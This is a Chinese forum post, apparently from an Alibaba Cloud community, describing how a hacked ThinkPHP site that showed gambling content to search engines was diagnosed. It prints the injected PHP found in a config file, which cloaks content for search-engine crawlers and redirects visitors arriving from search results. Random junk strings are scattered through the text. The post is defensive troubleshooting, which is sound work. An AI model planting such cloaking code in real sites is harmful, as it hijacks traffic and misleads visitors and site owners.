阿里云
云栖社区2017年度内容特辑
发表主题 回复主题
  • 2165阅读
  • 2回复

[基础常识]查找网站访问被跳转到其它网址原因一例

级别: 论坛版主
发帖
12587
云币
28717

— 本帖被 不靠谱贝贝 设置为精华(2017-08-24) —
感谢“***zy”的鼓励和支持。 8[8U49V9(  
bW'Y8ok[v  
一网友说他的网站被“黑”了,现象是,在搜索引擎里搜索网址,收录的首页是一个X彩的网站内容,且点击搜索引擎链接进入网站,会随机出现一些其它站点的内容。但直接在浏览器里输入网址就正常。 'FN3r  
ZJ_P=  
过程: [{_K[5i  
8ZO~=e  
1. 在网上搜索了一些资料,说有可能是根据访问者的 http User Agent 和 http_referer 来跳转或显示不同内容的 Z ?w=-  
.>( qZEF  
?Ye%k  
/B  
i"hn%u$V  
`P9%[8`C 9  
2. 同一台服务上的另一个站点不会出现类似的现象,所以就重点看发生问题的站点文件 'zTa]y]a  
WJ]g7!Ks  
3. 站点是用 ThinkPHP 框架写的,尝试替换 ThinkPHP 的文件内容,无效 N{zou?+  
S'v UxOAo  
4. 尝试替换 app 里的内容,也是无效 DRi/<  
Xc]Q_70O  
5. 鼓捣了很久(我是门外汉,不懂php编程和网站的安全运维),无意中,看到日志文件中出现 NOTIC: [8] Undefined index: HTTP_REFERER 的字样 PFeK;`[  
,u>K##X\  
gH/k}M7tA#  
ymyk.#Z<%  
6. 找到相应的文件,有以下php代码 F ?TmOa0  
H\e<fi%Q  
  1. <?php
  2. $arr = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  3. for($i=0;$i<count($arr);$i++){
  4.     if (ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {
  5.         $file = file_get_contents('http://bbs.aliyun.com/');
  6.         echo $file;
  7.         exit;
  8.     }
  9. }
  10. $arr1 = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  11. for($j=0;$j<count($arr1);$j++){
  12.     if (ereg($arr1[$j], $_SERVER["HTTP_REFERER"])) {
  13.         Header("Location: https://www.aliyun.com/");
  14.         exit;
  15.     }
  16. }
  17. return array (
  18.   'DB_HOST' => 'localhost',
  19.   'DB_NAME' => 'dbname',
  20.   'DB_USER' => 'dbuser',
  21.   'DB_PWD' => 'dbpassword',
  22.   'DB_PORT' => '3306',
  23.   'DB_PREFIX' => 'xxx_',
  24. );
Q|cA8Fn  
 \R<OT%8  
7. 注释掉怀疑的代码(return array 上边的)后测试,正常了 .DHRPel  
93#wU})  
参考:《网站被黑检测》 - http://s.tool.chin az.com/tools/webcheck.aspx
[ 此帖被dongshan8在2017-08-23 16:44重新编辑 ]
关键词: 跳转
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
级别: 禁止发言
发帖
51
云币
69
只看该作者 沙发  发表于: 2017-10-05
用户被禁言,该主题自动屏蔽!
级别: 小白
发帖
22
云币
28
只看该作者 板凳  发表于: 2017-10-11
Re查找网站访问被跳转到其它网址原因一例
感谢分享
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
验证问题: 10 - 1 = ?
上一个 下一个